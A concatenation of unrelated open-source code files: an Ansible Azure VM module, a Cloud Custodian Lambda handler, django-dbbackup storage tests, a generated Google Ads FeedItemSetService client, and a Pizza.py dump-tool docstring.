media_link = u'http://%s.blob.core.windows.net/vhds/%s-%s.vhd' % (storage_account, disk_prefix, today)
# Create system hard disk
os_hd = OSVirtualHardDisk(image, media_link)
# Spin up virtual machine
try:
result = azure.create_virtual_machine_deployment(service_name=name,
deployment_name=name,
deployment_slot='production',
label=name,
role_name=name,
system_config=vm_config,
network_config=network_config,
os_virtual_hard_disk=os_hd,
role_size=role_size,
role_type='PersistentVMRole',
virtual_network_name=virtual_network_name)
_wait_for_completion(azure, result, wait_timeout, "create_virtual_machine_deployment")
changed = True
except AzureException, e:
module.fail_json(msg="failed to create the new virtual machine, error was: %s" % str(e))
try:
deployment = azure.get_deployment_by_name(service_name=name, deployment_name=name)
return (changed, urlparse(deployment.url).hostname, deployment)
except AzureException, e:
module.fail_json(msg="failed to lookup the deployment information for %s, error was: %s" % (name, str(e)))
def terminate_virtual_machine(module, azure):
"""
Terminates a virtual machine
module : AnsibleModule object
azure: authenticated azure ServiceManagementService object
Returns:
True if a new virtual machine was deleted, false otherwise
"""
# Whether to wait for termination to complete before returning
wait = module.params.get('wait')
wait_timeout = int(module.params.get('wait_timeout'))
name = module.params.get('name')
delete_empty_services = module.params.get('delete_empty_services')
changed = False
deployment = None
public_dns_name = None
disk_names = []
try:
deployment = azure.get_deployment_by_name(service_name=name, deployment_name=name)
except AzureMissingException, e:
pass # no such deployment or service
except AzureException, e:
module.fail_json(msg="failed to find the deployment, error was: %s" % str(e))
# Delete deployment
if deployment:
changed = True
try:
# gather disk info
results = []
for role in deployment.role_list:
role_props = azure.get_role(name, deployment.name, role.role_name)
if role_props.os_virtual_hard_disk.disk_name not in disk_names:
disk_names.append(role_props.os_virtual_hard_disk.disk_name)
except AzureException, e:
module.fail_json(msg="failed to get the role %s, error was: %s" % (role.role_name, str(e)))
try:
result = azure.delete_deployment(name, deployment.name)
_wait_for_completion(azure, result, wait_timeout, "delete_deployment")
except AzureException, e:
module.fail_json(msg="failed to delete the deployment %s, error was: %s" % (deployment.name, str(e)))
# It's unclear when disks associated with a terminated deployment get detached.
# Thus, until the wait_timeout is reached, we continue to delete disks as they
# become detached by polling the list of remaining disks and examining the state.
try:
_delete_disks_when_detached(azure, wait_timeout, disk_names)
except (AzureException, TimeoutError), e:
module.fail_json(msg=str(e))
try:
# Now that the vm is deleted, remove the cloud service
result = azure.delete_hosted_service(service_name=name)
_wait_for_completion(azure, result, wait_timeout, "delete_hosted_service")
except AzureException, e:
module.fail_json(msg="failed to delete the service %s, error was: %s" % (name, str(e)))
public_dns_name = urlparse(deployment.url).hostname
return changed, public_dns_name, deployment
def get_azure_creds(module):
# Check module args for credentials, then check environment vars
subscription_id = module.params.get('subscription_id')
if not subscription_id:
subscription_id = os.environ.get('AZURE_SUBSCRIPTION_ID', None)
if not subscription_id:
module.fail_json(msg="No subscription_id provided. Please set 'AZURE_SUBSCRIPTION_ID' or use the 'subscription_id' parameter")
management_cert_path = module.params.get('management_cert_path')
if not management_cert_path:
management_cert_path = os.environ.get('AZURE_CERT_PATH', None)
if not management_cert_path:
module.fail_json(msg="No management_cert_path provided. Please set 'AZURE_CERT_PATH' or use the 'management_cert_path' parameter")
return subscription_id, management_cert_path
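# Summary of the resolution order above (explanatory comment, not original source):
#   subscription_id:      'subscription_id' module arg, else AZURE_SUBSCRIPTION_ID env var
#   management_cert_path: 'management_cert_path' module arg, else AZURE_CERT_PATH env var
# If either value is still missing, the module fails via fail_json().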
def main():
module = AnsibleModule(
argument_spec=dict(
ssh_cert_path=dict(),
name=dict(),
hostname=dict(),
os_type=dict(default='linux', choices=['linux', 'windows']),
location=dict(choices=AZURE_LOCATIONS),
role_size=dict(choices=AZURE_ROLE_SIZES),
subscription_id=dict(no_log=True),
storage_account=dict(),
management_cert_path=dict(),
endpoints=dict(default='22'),
user=dict(),
password=dict(),
image=dict(),
virtual_network_name=dict(default=None),
state=dict(default='present'),
wait=dict(type='bool', default=False),
wait_timeout=dict(default=600),
wait_timeout_redirects=dict(default=300),
auto_updates=dict(type='bool', default=False),
enable_winrm=dict(type='bool', default=True),
)
)
if not HAS_AZURE:
module.fail_json(msg='azure python module required for this module')
# create azure ServiceManagementService object
subscription_id, management_cert_path = get_azure_creds(module)
wait_timeout_redirects = int(module.params.get('wait_timeout_redirects'))
if hasattr(windows_azure, '__version__') and LooseVersion(windows_azure.__version__) <= "0.8.0":
# wrapper for handling redirects, which sdk versions <= 0.8.0 do not follow
azure = Wrapper(ServiceManagementService(subscription_id, management_cert_path), wait_timeout_redirects)
else:
azure = ServiceManagementService(subscription_id, management_cert_path)
cloud_service_raw = None
if module.params.get('state') == 'absent':
(changed, public_dns_name, deployment) = terminate_virtual_machine(module, azure)
elif module.params.get('state') == 'present':
# Changed is always set to true when provisioning new instances
if not module.params.get('name'):
module.fail_json(msg='name parameter is required for new instance')
if not module.params.get('image'):
module.fail_json(msg='image parameter is required for new instance')
if not module.params.get('user'):
module.fail_json(msg='user parameter is required for new instance')
if not module.params.get('location'):
module.fail_json(msg='location parameter is required for new instance')
if not module.params.get('storage_account'):
module.fail_json(msg='storage_account parameter is required for new instance')
if not (module.params.get('password') or module.params.get('ssh_cert_path')):
module.fail_json(msg='password or ssh_cert_path parameter is required for new instance')
(changed, public_dns_name, deployment) = create_virtual_machine(module, azure)
module.exit_json(changed=changed, public_dns_name=public_dns_name, deployment=json.loads(json.dumps(deployment, default=lambda o: o.__dict__)))
class Wrapper(object):
def __init__(self, obj, wait_timeout):
self.other = obj
self.wait_timeout = wait_timeout
def __getattr__(self, name):
if hasattr(self.other, name):
func = getattr(self.other, name)
return lambda *args, **kwargs: self._wrap(func, args, kwargs)
raise AttributeError(name)
def _wrap(self, func, args, kwargs):
if type(func) == MethodType:
result = self._handle_temporary_redirects(lambda: func(*args, **kwargs))
else:
result = self._handle_temporary_redirects(lambda: func(self.other, *args, **kwargs))
return result
def _handle_temporary_redirects(self, f):
wait_timeout = time.time() + self.wait_timeout
while wait_timeout > time.time():
try:
return f()
except AzureException, e:
if not str(e).lower().find("temporary redirect") == -1:
time.sleep(5)
pass
else:
raise e
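# Illustrative use of the Wrapper above (a sketch; argument values are hypothetical):
#   azure = Wrapper(ServiceManagementService(subscription_id, management_cert_path),
#                   wait_timeout_redirects)
#   azure.get_deployment_by_name(service_name='svc', deployment_name='svc')
# Attribute access is proxied through __getattr__, and the wrapped call is retried
# every 5 seconds on "temporary redirect" errors until the timeout expires.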
# import module snippets
from ansible.module_utils.basic import *
if __name__ == '__main__':
main()
| gpl-3.0 | -7,997,537,051,547,410,000 | 38.472131 | 289 | 0.609145 | false |
scotwk/cloud-custodian | tools/c7n_sphere11/c7n_sphere11/handler.py | 4 | 1871 | # Copyright 2017 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import logging
import pprint
import sys
from c7n.utils import format_event
from c7n.resources import load_resources
import app
import wsgigw
logging.root.setLevel(logging.DEBUG)
logging.getLogger('botocore').setLevel(logging.WARNING)
load_resources()
def debug(event, context):
print sys.executable
print sys.version
print sys.path
pprint.pprint(os.environ)
print format_event(event)
def lambda_handler(event, context=None):
# Periodic
if event.get('detail-type') == 'Scheduled Event':
debug(event, context)
return app.on_timer(event)
# SNS / Dynamodb / Kinesis
elif event.get('Records'):
records = event['Records']
if records and records[0]['EventSource'] == 'aws:sns':
return app.on_config_message(records)
else:
return debug(event, context)
elif not event.get('path'):
return debug(event, context)
# API Gateway
if app.config.get('sentry-dsn'):
from raven import Client
from raven.contrib.bottle import Sentry
client = Client(app.config['sentry-dsn'])
app.app.catchall = False
wrapped_app = Sentry(app.app, client)
else:
wrapped_app = app.app
return wsgigw.invoke(wrapped_app, event)
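# Routing summary for lambda_handler (explanatory comment, not part of the original logic):
#   scheduled event: event['detail-type'] == 'Scheduled Event' -> app.on_timer(event)
#   SNS delivery: event['Records'][0]['EventSource'] == 'aws:sns' -> app.on_config_message(records)
#   API Gateway proxy: event carries a 'path' key -> wsgigw.invoke(app, event), wrapped by Sentry if configured
#   anything else -> debug(event, context)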
| apache-2.0 | 1,467,757,836,904,320,500 | 26.925373 | 74 | 0.693212 | false |
VerosK/django-dbbackup | dbbackup/tests/storages/test_filesystem.py | 4 | 2548 | import os
import tempfile
import shutil
from io import BytesIO
from mock import patch
from django.test import TestCase
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from dbbackup.storage.filesystem_storage import Storage as FileSystemStorage
class FileSystemStorageTest(TestCase):
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(location=self.temp_dir)
def tearDown(self):
shutil.rmtree(self.temp_dir)
def test_delete_file(self):
file_path = os.path.join(self.temp_dir, 'foo')
open(file_path, 'w').close()
self.storage.delete_file('foo')
self.assertFalse(os.listdir(self.temp_dir))
def test_list_directory(self):
file_path1 = os.path.join(self.temp_dir, 'foo')
file_path2 = os.path.join(self.temp_dir, 'bar')
self.assertEqual(0, len(os.listdir(self.temp_dir)))
open(file_path1, 'w').close()
self.assertEqual(1, len(os.listdir(self.temp_dir)))
open(file_path2, 'w').close()
self.assertEqual(2, len(os.listdir(self.temp_dir)))
def test_write_file(self):
file_path = os.path.join(self.temp_dir, 'foo')
self.storage.write_file(BytesIO(b'bar'), 'foo')
self.assertTrue(os.path.exists(file_path))
self.assertEqual(open(file_path).read(), 'bar')
def test_read_file(self):
file_path = os.path.join(self.temp_dir, 'foo')
with open(file_path, 'w') as fd:
fd.write('bar')
read_file = self.storage.read_file('foo')
self.assertEqual(read_file.read(), b'bar')
class FileSystemStorageCheckTest(TestCase):
def test_fail_location_is_none(self):
with self.assertRaises(Exception):
self.storage = FileSystemStorage(location=None)
def test_fail_location_is_empty_str(self):
with self.assertRaises(Exception):
self.storage = FileSystemStorage(location='')
def test_fail_no_location(self):
with self.assertRaises(Exception):
self.storage = FileSystemStorage()
def test_fail_backup_in_media_file(self):
with self.assertRaises(ImproperlyConfigured):
self.storage = FileSystemStorage(location=settings.MEDIA_ROOT)
@patch('django.conf.settings.DEBUG', True)
def test_success_backup_in_media_file_debug(self):
self.storage = FileSystemStorage(location=settings.MEDIA_ROOT)
def test_success(self):
self.storage = FileSystemStorage(location='foo')
| bsd-3-clause | -3,269,493,144,050,323,500 | 34.887324 | 76 | 0.666797 | false |
googleapis/googleapis-gen | google/ads/googleads/v8/googleads-py/google/ads/googleads/v8/services/services/feed_item_set_service/client.py | 1 | 22845 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
from distutils import util
import os
import re
from typing import Callable, Dict, Optional, Sequence, Tuple, Type, Union
import pkg_resources
from google.api_core import client_options as client_options_lib # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport import mtls # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
from google.auth.exceptions import MutualTLSChannelError # type: ignore
from google.oauth2 import service_account # type: ignore
from google.ads.googleads.v8.common.types import feed_item_set_filter_type_infos
from google.ads.googleads.v8.enums.types import feed_item_set_status
from google.ads.googleads.v8.resources.types import feed_item_set
from google.ads.googleads.v8.services.types import feed_item_set_service
from .transports.base import FeedItemSetServiceTransport, DEFAULT_CLIENT_INFO
from .transports.grpc import FeedItemSetServiceGrpcTransport
class FeedItemSetServiceClientMeta(type):
"""Metaclass for the FeedItemSetService client.
This provides class-level methods for building and retrieving
support objects (e.g. transport) without polluting the client instance
objects.
"""
_transport_registry = OrderedDict() # type: Dict[str, Type[FeedItemSetServiceTransport]]
_transport_registry['grpc'] = FeedItemSetServiceGrpcTransport
def get_transport_class(cls,
label: str = None,
) -> Type[FeedItemSetServiceTransport]:
"""Return an appropriate transport class.
Args:
label: The name of the desired transport. If none is
provided, then the first transport in the registry is used.
Returns:
The transport class to use.
"""
# If a specific transport is requested, return that one.
if label:
return cls._transport_registry[label]
# No transport is requested; return the default (that is, the first one
# in the dictionary).
return next(iter(cls._transport_registry.values()))
class FeedItemSetServiceClient(metaclass=FeedItemSetServiceClientMeta):
"""Service to manage feed Item Set"""
@staticmethod
def _get_default_mtls_endpoint(api_endpoint):
"""Convert api endpoint to mTLS endpoint.
Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to
"*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively.
Args:
api_endpoint (Optional[str]): the api endpoint to convert.
Returns:
str: converted mTLS api endpoint.
"""
if not api_endpoint:
return api_endpoint
mtls_endpoint_re = re.compile(
r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?"
)
m = mtls_endpoint_re.match(api_endpoint)
name, mtls, sandbox, googledomain = m.groups()
if mtls or not googledomain:
return api_endpoint
if sandbox:
return api_endpoint.replace(
"sandbox.googleapis.com", "mtls.sandbox.googleapis.com"
)
return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com")
DEFAULT_ENDPOINT = 'googleads.googleapis.com'
DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore
DEFAULT_ENDPOINT
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
FeedItemSetServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_info(info)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
FeedItemSetServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(
filename)
kwargs['credentials'] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
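# Illustrative usage (the key file path is hypothetical):
#   client = FeedItemSetServiceClient.from_service_account_file(
#       "/path/to/service-account.json")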
@property
def transport(self) -> FeedItemSetServiceTransport:
"""Return the transport used by the client instance.
Returns:
FeedItemSetServiceTransport: The transport used by the client instance.
"""
return self._transport
@staticmethod
def feed_path(customer_id: str,feed_id: str,) -> str:
"""Return a fully-qualified feed string."""
return "customers/{customer_id}/feeds/{feed_id}".format(customer_id=customer_id, feed_id=feed_id, )
@staticmethod
def parse_feed_path(path: str) -> Dict[str,str]:
"""Parse a feed path into its component segments."""
m = re.match(r"^customers/(?P<customer_id>.+?)/feeds/(?P<feed_id>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def feed_item_set_path(customer_id: str,feed_id: str,feed_item_set_id: str,) -> str:
"""Return a fully-qualified feed_item_set string."""
return "customers/{customer_id}/feedItemSets/{feed_id}~{feed_item_set_id}".format(customer_id=customer_id, feed_id=feed_id, feed_item_set_id=feed_item_set_id, )
@staticmethod
def parse_feed_item_set_path(path: str) -> Dict[str,str]:
"""Parse a feed_item_set path into its component segments."""
m = re.match(r"^customers/(?P<customer_id>.+?)/feedItemSets/(?P<feed_id>.+?)~(?P<feed_item_set_id>.+?)$", path)
return m.groupdict() if m else {}
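# For instance (IDs are illustrative):
#   feed_item_set_path("123", "456", "789")
#       -> "customers/123/feedItemSets/456~789"
#   parse_feed_item_set_path("customers/123/feedItemSets/456~789")
#       -> {"customer_id": "123", "feed_id": "456", "feed_item_set_id": "789"}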
@staticmethod
def common_billing_account_path(billing_account: str, ) -> str:
"""Return a fully-qualified billing_account string."""
return "billingAccounts/{billing_account}".format(billing_account=billing_account, )
@staticmethod
def parse_common_billing_account_path(path: str) -> Dict[str,str]:
"""Parse a billing_account path into its component segments."""
m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_folder_path(folder: str, ) -> str:
"""Return a fully-qualified folder string."""
return "folders/{folder}".format(folder=folder, )
@staticmethod
def parse_common_folder_path(path: str) -> Dict[str,str]:
"""Parse a folder path into its component segments."""
m = re.match(r"^folders/(?P<folder>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_organization_path(organization: str, ) -> str:
"""Return a fully-qualified organization string."""
return "organizations/{organization}".format(organization=organization, )
@staticmethod
def parse_common_organization_path(path: str) -> Dict[str,str]:
"""Parse a organization path into its component segments."""
m = re.match(r"^organizations/(?P<organization>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_project_path(project: str, ) -> str:
"""Return a fully-qualified project string."""
return "projects/{project}".format(project=project, )
@staticmethod
def parse_common_project_path(path: str) -> Dict[str,str]:
"""Parse a project path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_location_path(project: str, location: str, ) -> str:
"""Return a fully-qualified location string."""
return "projects/{project}/locations/{location}".format(project=project, location=location, )
@staticmethod
def parse_common_location_path(path: str) -> Dict[str,str]:
"""Parse a location path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path)
return m.groupdict() if m else {}
def __init__(self, *,
credentials: Optional[ga_credentials.Credentials] = None,
transport: Union[str, FeedItemSetServiceTransport, None] = None,
client_options: Optional[client_options_lib.ClientOptions] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiate the feed item set service client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, ~.FeedItemSetServiceTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. It won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
if isinstance(client_options, dict):
client_options = client_options_lib.from_dict(client_options)
if client_options is None:
client_options = client_options_lib.ClientOptions()
# Create SSL credentials for mutual TLS if needed.
use_client_cert = bool(util.strtobool(os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false")))
ssl_credentials = None
is_mtls = False
if use_client_cert:
if client_options.client_cert_source:
import grpc # type: ignore
cert, key = client_options.client_cert_source()
ssl_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
is_mtls = True
else:
creds = SslCredentials()
is_mtls = creds.is_mtls
ssl_credentials = creds.ssl_credentials if is_mtls else None
# Figure out which api endpoint to use.
if client_options.api_endpoint is not None:
api_endpoint = client_options.api_endpoint
else:
use_mtls_env = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto")
if use_mtls_env == "never":
api_endpoint = self.DEFAULT_ENDPOINT
elif use_mtls_env == "always":
api_endpoint = self.DEFAULT_MTLS_ENDPOINT
elif use_mtls_env == "auto":
api_endpoint = self.DEFAULT_MTLS_ENDPOINT if is_mtls else self.DEFAULT_ENDPOINT
else:
raise MutualTLSChannelError(
"Unsupported GOOGLE_API_USE_MTLS_ENDPOINT value. Accepted values: never, auto, always"
)
# Save or instantiate the transport.
# Ordinarily, we provide the transport, but allowing a custom transport
# instance provides an extensibility point for unusual situations.
if isinstance(transport, FeedItemSetServiceTransport):
# transport is a FeedItemSetServiceTransport instance.
if credentials:
raise ValueError('When providing a transport instance, '
'provide its credentials directly.')
self._transport = transport
elif isinstance(transport, str):
Transport = type(self).get_transport_class(transport)
self._transport = Transport(
credentials=credentials, host=self.DEFAULT_ENDPOINT
)
else:
self._transport = FeedItemSetServiceGrpcTransport(
credentials=credentials,
host=api_endpoint,
ssl_channel_credentials=ssl_credentials,
client_info=client_info,
)
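# Illustrative construction (a sketch; the credentials object is an assumption):
#   client = FeedItemSetServiceClient(
#       credentials=credentials,
#       client_options={"api_endpoint": "googleads.googleapis.com"})
# A plain dict passed as client_options is converted with client_options_lib.from_dict().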
def get_feed_item_set(self,
request: feed_item_set_service.GetFeedItemSetRequest = None,
*,
resource_name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> feed_item_set.FeedItemSet:
r"""Returns the requested feed item set in full detail.
List of thrown errors: `AuthenticationError <>`__
`AuthorizationError <>`__ `HeaderError <>`__
`InternalError <>`__ `QuotaError <>`__ `RequestError <>`__
Args:
request (:class:`google.ads.googleads.v8.services.types.GetFeedItemSetRequest`):
The request object. Request message for
[FeedItemSetService.GetFeedItemSet][google.ads.googleads.v8.services.FeedItemSetService.GetFeedItemSet].
resource_name (:class:`str`):
Required. The resource name of the
feed item set to fetch.
This corresponds to the ``resource_name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.ads.googleads.v8.resources.types.FeedItemSet:
Represents a set of feed items. The
set can be used and shared among certain
feed item features. For instance, the
set can be referenced within the
matching functions of CustomerFeed,
CampaignFeed, and AdGroupFeed.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
if request is not None and any([resource_name]):
raise ValueError('If the `request` argument is set, then none of '
'the individual field arguments should be set.')
# Minor optimization to avoid making a copy if the user passes
# in a feed_item_set_service.GetFeedItemSetRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, feed_item_set_service.GetFeedItemSetRequest):
request = feed_item_set_service.GetFeedItemSetRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if resource_name is not None:
request.resource_name = resource_name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.get_feed_item_set]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((
('resource_name', request.resource_name),
)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
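# Illustrative call (resource name segments are hypothetical):
#   feed_item_set = client.get_feed_item_set(
#       resource_name="customers/123/feedItemSets/456~789")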
def mutate_feed_item_sets(self,
request: feed_item_set_service.MutateFeedItemSetsRequest = None,
*,
customer_id: str = None,
operations: Sequence[feed_item_set_service.FeedItemSetOperation] = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> feed_item_set_service.MutateFeedItemSetsResponse:
r"""Creates, updates or removes feed item sets. Operation statuses
are returned.
List of thrown errors: `AuthenticationError <>`__
`AuthorizationError <>`__ `HeaderError <>`__
`InternalError <>`__ `MutateError <>`__ `QuotaError <>`__
`RequestError <>`__
Args:
request (:class:`google.ads.googleads.v8.services.types.MutateFeedItemSetsRequest`):
The request object. Request message for
[FeedItemSetService.MutateFeedItemSets][google.ads.googleads.v8.services.FeedItemSetService.MutateFeedItemSets].
customer_id (:class:`str`):
Required. The ID of the customer
whose feed item sets are being modified.
This corresponds to the ``customer_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
operations (:class:`Sequence[google.ads.googleads.v8.services.types.FeedItemSetOperation]`):
Required. The list of operations to
perform on individual feed item sets.
This corresponds to the ``operations`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.ads.googleads.v8.services.types.MutateFeedItemSetsResponse:
Response message for a feed item set
mutate.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
if request is not None and any([customer_id, operations]):
raise ValueError('If the `request` argument is set, then none of '
'the individual field arguments should be set.')
# Minor optimization to avoid making a copy if the user passes
# in a feed_item_set_service.MutateFeedItemSetsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, feed_item_set_service.MutateFeedItemSetsRequest):
request = feed_item_set_service.MutateFeedItemSetsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if customer_id is not None:
request.customer_id = customer_id
if operations is not None:
request.operations = operations
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.mutate_feed_item_sets]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((
('customer_id', request.customer_id),
)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
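# Illustrative call (the customer ID is hypothetical; each operation is a
# feed_item_set_service.FeedItemSetOperation message):
#   response = client.mutate_feed_item_sets(
#       customer_id="1234567890", operations=[operation])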
__all__ = (
'FeedItemSetServiceClient',
)
| apache-2.0 | -877,402,544,972,360,700 | 43.794118 | 168 | 0.621536 | false |
tm1249wk/WASHLIGGGHTS-3.3.x | python/examples/pizza/dump.py | 36 | 40308 | # Pizza.py toolkit, www.cs.sandia.gov/~sjplimp/pizza.html
# Steve Plimpton, [email protected], Sandia National Laboratories
#
# Copyright (2005) Sandia Corporation. Under the terms of Contract
# DE-AC04-94AL85000 with Sandia Corporation, the U.S. Government retains
# certain rights in this software. This software is distributed under
# the GNU General Public License.
# dump tool
oneline = "Read, write, manipulate dump files and particle attributes"
docstr = """
d = dump("dump.one") read in one or more dump files
d = dump("dump.1 dump.2.gz") can be gzipped
d = dump("dump.*") wildcard expands to multiple files
d = dump("dump.*",0) two args = store filenames, but don't read
incomplete and duplicate snapshots are deleted
if atoms have 5 or 8 columns, assign id,type,x,y,z (ix,iy,iz)
atoms will be unscaled if stored in files as scaled
time = d.next() read next snapshot from dump files
used with 2-argument constructor to allow reading snapshots one-at-a-time
snapshot will be skipped only if another snapshot has same time stamp
return time stamp of snapshot read
return -1 if no snapshots left or last snapshot is incomplete
no column name assignment or unscaling is performed
d.map(1,"id",3,"x") assign names to atom columns (1-N)
not needed if dump file is self-describing
d.tselect.all() select all timesteps
d.tselect.one(N) select only timestep N
d.tselect.none() deselect all timesteps
d.tselect.skip(M) select every Mth step
d.tselect.test("$t >= 100 and $t < 10000") select matching timesteps
d.delete() delete non-selected timesteps
selecting a timestep also selects all atoms in the timestep
skip() and test() only select from currently selected timesteps
test() uses a Python Boolean expression with $t for timestep value
Python comparison syntax: == != < > <= >= and or
d.aselect.all() select all atoms in all steps
d.aselect.all(N) select all atoms in one step
d.aselect.test("$id > 100 and $type == 2") select match atoms in all steps
d.aselect.test("$id > 100 and $type == 2",N) select matching atoms in one step
all() with no args selects atoms from currently selected timesteps
test() with one arg selects atoms from currently selected timesteps
test() sub-selects from currently selected atoms
test() uses a Python Boolean expression with $ for atom attributes
Python comparison syntax: == != < > <= >= and or
$name must end with a space
d.write("file") write selected steps/atoms to dump file
d.write("file",head,app) write selected steps/atoms to dump file
d.scatter("tmp") write selected steps/atoms to multiple files
write() can be specified with 2 additional flags
head = 0/1 for no/yes snapshot header, app = 0/1 for write vs append
scatter() files are given timestep suffix: e.g. tmp.0, tmp.100, etc
d.scale() scale x,y,z to 0-1 for all timesteps
d.scale(100) scale atom coords for timestep N
d.unscale() unscale x,y,z to box size to all timesteps
d.unscale(1000) unscale atom coords for timestep N
d.wrap() wrap x,y,z into periodic box via ix,iy,iz
d.unwrap() unwrap x,y,z out of box via ix,iy,iz
d.owrap("other") wrap x,y,z to same image as another atom
d.sort() sort atoms by atom ID in all selected steps
d.sort("x") sort atoms by column value in all steps
d.sort(1000) sort atoms in timestep N
scale(), unscale(), wrap(), unwrap(), owrap() operate on all steps and atoms
wrap(), unwrap(), owrap() require ix,iy,iz be defined
owrap() requires a column be defined which contains an atom ID
name of that column is the argument to owrap()
x,y,z for each atom is wrapped to same image as the associated atom ID
useful for wrapping all molecule's atoms the same so it is contiguous
m1,m2 = d.minmax("type") find min/max values for a column
d.set("$ke = $vx * $vx + $vy * $vy") set a column to a computed value
d.setv("type",vector) set a column to a vector of values
d.spread("ke",N,"color") 2nd col = N ints spread over 1st col
d.clone(1000,"color") clone timestep N values to other steps
